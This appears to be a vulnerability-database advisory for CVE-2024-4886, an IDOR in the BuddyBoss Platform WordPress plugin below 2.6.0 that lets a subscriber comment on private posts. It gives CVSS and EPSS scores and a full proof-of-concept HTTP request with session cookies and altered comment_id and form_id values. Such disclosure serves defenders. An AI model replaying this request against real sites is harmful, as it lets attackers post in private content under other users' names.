Lucene search
Faris KrivicWPEX-ID:76E8591F-120C-4CD7-B9A2-79F8D4D98AA8HistoryMay 15, 2024 - 12:00 a.m.
BuddyBoss Platform < 2.6.0 - Subscriber+ Comment on Private Post via IDOR
2024-05-1500:00:00
Faris Krivic
16
buddyboss platform
subscriber
private posts
idor vulnerability
proof of concept
may 29 2024
update
4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
6.6 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
14.1%
Description The plugin contains an IDOR vulnerability that allows a user to comment on a private post by manipulating the ID included in the request
POST /wp-admin/admin-ajax.php HTTP/2
Host: online-communities.demos.buddyboss.com
Cookie: wordpress_sec_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7Cad6f4652de2481a56e68bdd28c294386fae37234e735065d6b90abd61ec052e9; _gcl_au=1.1.780899166.1702488357; _ga_YJ9BETCSZM=GS1.1.1702488357.1.1.1702489668.60.0.0; _ga=GA1.2.700400885.1702488358; _pin_unauth=dWlkPU1qWmpOVGhsTVRBdE16QmtNUzAwWVRJd0xXRmhaV1V0TURWaE1XUm1aall5WTJFeQ; _gid=GA1.2.1652937291.1702488358; psuid=9ba8f98a-a8df-4e85-be53-540ffc862ed1; ps5b7449d2840fc1452412f2fe=true|1700697600000; _fbp=fb.1.1702488359281.1942424250; ab-sandbox_019a643733c4caf6b40a23bdf343c136=66566579e92883ee8%7C256035; tk_ai=woo%3AYqcaaRyMBwKX1aMgKwlMVWzS; redux_current_tab=undefined; redux_current_tab_get=undefined; redux_current_tab_buddyboss_theme_options=undefined; tk_qs=; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=5e5b26d2ede9d2856d58613b04cbbc5c; wordpress_logged_in_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7C6dc658c846e2a136591d87ec20e80fe6176895bdbbbafc955959dcb2f9b35889; _gat_UA-235369-35=1; _uetsid=ae00a78099dc11eeb8b089e40d4468de; _uetvid=ae008bf099dc11ee8decf552a53d469a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://online-communities.demos.buddyboss.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 195
Origin: https://online-communities.demos.buddyboss.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
scope=all&nonce=2081885524&action=new_activity_comment&_wpnonce_new_activity_comment=bc95aefd23&comment_id=194628&form_id=194628&content=%3Cp%3ETHIS+SHOULD+NOT+HAPPEN%3Cbr%3E%3C%2Fp%3E&modbypass=
The vulnerability was identified in the comment_id and form_id parameters which allowed private post to be commented as another user.Related
nvd
nvd
CVE-2024-4886
2024-06-05 06:15:12
vulnrichment
vulnrichment
cve
cve
CVE-2024-4886
2024-06-05 06:15:12
wpvulndb
wpvulndb
BuddyBoss Platform < 2.6.0 - Subscriber+ Comment on Private Post via IDOR
2024-05-15 00:00:00
cvelist
cvelist
wordfence
wordfence
4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
6.6 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
14.1%
Related for WPEX-ID:76E8591F-120C-4CD7-B9A2-79F8D4D98AA8